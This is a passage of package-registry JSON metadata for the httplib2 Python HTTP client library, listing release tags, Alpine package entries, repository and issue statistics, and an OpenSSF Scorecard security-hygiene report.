g:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T01:44:48.633Z","dependent_packages_count":3,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":6.708380346702227,"stargazers_count":5.50825725715458,"forks_count":3.8670632885424148,"average":4.020925223099805},"purl":"pkg:apk/alpine/py2-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.9","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py2-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py2-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py2-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py2-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py2-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py2-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py2-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py2-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py2-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":259,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T04:46:18.209Z","updated_at":"2023-02-01T04:46:18.209Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.9","url":"https://pkgs.alpinelinux.org/packages?branch=v3.9","ecosystem":"alpine","default":false,"packages_count":9749,"maintainers_count":154,"namespaces_count":2,"keywords_count":832,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":361},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.805Z","updated_at":"2026-08-18T05:03:05.558Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/namespaces"}},{"id":6056748,"name":"py3-httplib2","ecosystem":"alpine","description":"HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":5,"first_release_published_at":"2022-11-22T19:33:35.000Z","latest_release_published_at":"2025-09-05T04:34:46.000Z","latest_release_number":"0.30.0-r0","last_synced_at":"2026-08-06T03:06:56.781Z","created_at":"2023-01-31T18:54:29.222Z","updated_at":"2026-08-22T02:01:46.967Z","registry_url":"https://pkgs.alpinelinux.org/package/edge/community/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/